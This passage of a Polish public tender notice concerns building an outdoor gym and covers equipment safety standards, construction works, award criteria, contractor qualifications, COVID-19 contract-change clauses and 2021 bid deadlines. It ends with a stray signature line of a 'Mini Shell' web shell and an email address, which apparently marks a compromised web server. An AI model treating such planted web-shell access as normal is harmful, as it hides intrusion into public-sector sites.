gwarancji i rękojmi jednak nie dłuższym niż 7 – lat licząc od dnia przekazania przedmiotu zamówienia Zamawiającemu. Dokument gwarancyjny stanowi Załącznik Nr 2 do umowy.<br/>4)	Urządzenia powinny: <br/>a)	zawierać instrukcję obsługi słowną i obrazkową umieszczoną na pylonie.<br/>b)	posiadać umieszczony przez producenta czytelny znak poziomu podstawowego, wskazującego wysokość, na jakiej montaż w gruncie gwarantuje stabilność sprzętu (znak ten powinien być równy z nawierzchnią lub płaszczyzną placu). <br/>c)	być oznaczone tabliczką znamionową zawierającą informację o numerze katalogowym pozwalającym na ich identyfikację w karcie technicznej urządzenia i certyfikacie, nazwie i adresie producenta lub upoważnionego przedstawiciela, dacie produkcji, numerze seryjnym, numerze i dacie normy, zgodnie z którą urządzenie wyprodukowano.<br/>d)	być wykonane z bezpiecznych i trwałych materiałów i być zgodny z normami z grupy PN EN 1176-2009 i PN-EN 1177:2009 i warunkami bezpieczeństwa określonymi w szczególności w przepisach o ogólnym bezpieczeństwie produktów oraz przepisach w sprawie bezpieczeństwa i higieny w szkołach. <br/>e)	być rozmieszczone na wydzielonym placu w sposób umożliwiający zachowanie stref bezpieczeństwa pomiędzy urządzeniami. <br/>f)	zamontowane zgodnie z instrukcją producenta urządzenia.<br/>5)	Regulamin umieszczony na tablicy informacyjnej winien zawierać zasady i warunki korzystania z siłowni zewnętrznej, numery alarmowe, numer telefonu do Zarządcy placu, na którym zlokalizowana jest siłownia oraz adres tego placu. Ostateczna treść powinna zostać uzgodniona wcześniej z Zamawiającym. <br/>6)	Wszystkie urządzenia oraz elementy małej architektury muszą być na stałe posadowione w gruncie poprzez zabetonowanie elementów kotwiących.<br/>4.4.	Wymagania dotyczące robót<br/>1)	Roboty przygotowawcze, w tym: <br/>a)	wygrodzenie placu budowy przed dostępem osób nieupoważnionych,<br/>b)	uporządkowanie i wyrównanie terenu przed rozpoczęciem robót.<br/>2)	Roboty budowlane, w tym:<br/>a)	wyznaczenie w granicach placu budowy miejsc usytuowania urządzeń wymienionych w dokumentacji projektowej; <br/>b)	korytowanie pod fundamenty urządzeń;<br/>c)	wykonanie fundamentów w miejscach pod urządzenia wyposażenia zgodnie z instrukcją producenta w zakresie technologii połączenia z montowanymi urządzeniami.<br/>3)	Szczegółowy opis przedmiotu zamówienia w zakresie robót budowlanych zawarty jest w:<br/>Załącznik nr 8B do SWZ	-	Dokumentacja techniczna dla ZADANIA II:<br/>Załącznik nr 9B do SWZ	-	Przedmiar dla ZADANIA II (pdf.)<br/>4)	Realizacja robót dotyczących przedmiotowej inwestycji w zakresie technologii jak i samej budowy musi odpowiadać przepisom prawa, w tym techniczno-budowlanym, warunkom technicznym wykonania i odbioru robót budowlanych i montażowych w zakresie wykonania „małej architektury” oraz Polskim Normom, aprobatom technicznym i/lub deklaracjom zgodności lub innym dokumentom normującym wprowadzenie wyrobów do obrotu i stosowania w budownictwie. <br/>5)	Podczas realizacji robót dotyczących przedmiotowej inwestycji wymagane jest od Wykonawcy obligatoryjne przestrzeganie Polskich Norm wskazanych w dokumentacji projektowej i stosownych do przedmiotowej inwestycji przepisów prawa, w tym: <br/>	ustawy z dnia 7 lipca 1994 roku Prawo budowlane (t.j. Dz. U. z 2020r., poz. 1333 z późn. zm.) wraz z aktami wykonawczymi,<br/>	rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. Nr 109, poz. 719 z późn. zm.), <br/>	rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz. U. z 2003r. Nr 169, poz. 1650, z późn. zm.),<br/>	ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2020. poz. 1219 z późn. zm.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37530000-2 - Artykuły do zabaw na wolnym powietrzu, gier salonowych lub towarzyskich</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <p class="mb-0">45212140-9 - Obiekty rekreacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału dotyczące zdolności technicznej lub zawodowej: Wykonawca spełni ten warunek, jeżeli przedstawi wykaz co najmniej dwóch robót budowlanych polegających na wykonaniu siłowni zewnętrznych/plenerowych o łącznej wartości minimum 100.000,00 zł brutto z podaniem ich wartości, rodzaju, dat wykonania zakończenia oraz miejsca i podmiotów, na rzecz których roboty te zostały wykonane, nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">PONIŻSZA NUMERACJA ZGODNA Z SWZ.<br/>16.1.6.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a)	wykazu robót budowlanych polegających na wykonaniu siłowni zewnętrznych/plenerowych - wzór – załącznik nr 5 do SWZ,,<br/>- Okres wyrażony w latach, o którym mowa w pkt. 16.1.6. pkt. lit. a) SWZ, liczy się wstecz od dnia w którym upływa termin składania ofert.<br/>- Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych/dostaw/usług (w zależności od rodzaju zamówienia), wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa w pkt. 14.1. pkt. 4) SWZ, dotyczy robót budowlanych/dostaw/usług (w zależności od rodzaju zamówienia), w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">PONIŻSZA NUMERACJA ZGODNA Z SWZ.<br/>16.1.2. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a)	oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;kapitałowej – wzór - załącznik nr 3 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę składają się następujące dokumenty:<br/>1)	formularz oferty przygotowany zgodnie ze wzorem, który stanowi załącznik nr 1 do SWZ;<br/>2)	oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 16.1. SWZ - zgodne ze wzorem, który stanowi załącznik nr 2 do SWZ;<br/>3)	zobowiązanie podmiotu udostępniającego zasoby (jeśli dotyczy) - zgodne ze wzorem, który stanowi załącznik nr 4 do SWZ;<br/>4)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>5)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>6)	tłumaczenia dokumentów sporządzonych w języku obcym na język polski poświadczonych przez Wykonawcę – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ZMIANY UMOWY ZAWARTE ZOSTAŁY W § 18 UMOWY<br/>1.	Strony umowy w sprawie zamówienia niezwłocznie, wzajemnie informują się o wpływie okoliczności związanych z wystąpieniem zachorowań na COVID-19 na należyte wykonanie tej umowy, o ile taki wpływ wystąpił lub może wystąpić. Strony umowy potwierdzają ten wpływ dołączając do informacji, o której mowa w zdaniu pierwszym, oświadczenia lub dokumenty, które mogą dotyczyć w szczególności: <br/>1)	nieobecności pracowników lub osób świadczących pracę za wynagrodzeniem na innej podstawie niż stosunek pracy, które uczestniczą lub mogłyby uczestniczyć w realizacji zamówienia; <br/>2)	decyzji wydanych przez Głównego Inspektora Sanitarnego lub działającego z jego upoważnienia państwowego wojewódzkiego inspektora sanitarnego, w związku z przeciwdziałaniem COVID-19, nakładających na wykonawcę obowiązek podjęcia określonych czynności zapobiegawczych lub kontrolnych; <br/>3)	poleceń lub decyzji wydanych przez wojewodów, ministra właściwego do spraw zdrowia lub Prezesa Rady Ministrów, związanych z przeciwdziałaniem COVID-19 <br/>4)	wstrzymania dostaw produktów, komponentów produktu lub materiałów, trudności w dostępie do sprzętu lub trudności w realizacji usług transportowych; <br/>5)	innych okoliczności, które uniemożliwiają bądź w istotnym stopniu ograniczają możliwość wykonania umowy; <br/>2.	Każda ze stron umowy, o której mowa w ust. 1, może żądać przedstawienia dodatkowych oświadczeń lub dokumentów potwierdzających wpływ okoliczności związanych z wystąpieniem COVID-19 na należyte wykonanie tej umowy. <br/>3.	Strona umowy, o której mowa w ust. 1, na podstawie otrzymanych oświadczeń lub dokumentów, o których mowa w ust. 1 i 2, w terminie 14 dni od dnia ich otrzymania, przekazuje drugiej stronie swoje stanowisko, wraz z uzasadnieniem, odnośnie do wpływu okoliczności, o których mowa w ust. 1, na należyte jej wykonanie. Jeżeli strona umowy otrzymała kolejne oświadczenia lub dokumenty, termin liczony jest od dnia ich otrzymania. <br/>4.	Zamawiający, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, o których mowa w ust. 1, mogą wpłynąć lub wpływają na należyte wykonanie umowy, o której mowa w ust. 1, może w uzgodnieniu z wykonawcą dokonać zmiany umowy, w szczególności przez: <br/>5.	Strona umowy, o której mowa w ust. 1, w stanowisku, o którym mowa w ust. 3, przedstawia wpływ okoliczności związanych z wystąpieniem COVID-19 na należyte jej wykonanie oraz wpływ okoliczności związanych z wystąpieniem COVID-19, na zasadność ustalenia i dochodzenia tych kar lub odszkodowań, lub ich wysokość. <br/>6.	Wykonawca, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, mogą wpłynąć lub wpływają na należyte wykonanie łączącej ich umowy, która jest związana z wykonaniem zamówienia lub jego części, uzgadniają odpowiednią zmianę tej umowy, w szczególności mogą zmienić termin wykonania umowy lub jej części, czasowo zawiesić wykonywanie umowy lub jej części, zmienić sposób wykonywania umowy lub zmienić zakres wzajemnych świadczeń.<br/>1)	zmianę terminu wykonania umowy lub jej części, lub czasowe zawieszenie wykonywania umowy lub jej części; <br/>2)	zmianę sposobu wykonywania dostawy; <br/>3)	zmianę zakresu świadczenia wykonawcy i odpowiadającą jej zmianę wynagrodzenia lub sposobu rozliczenia wynagrodzenia wykonawcy – o ile wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekroczy 50% wartości pierwotnej umowy; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiatminski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-23 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com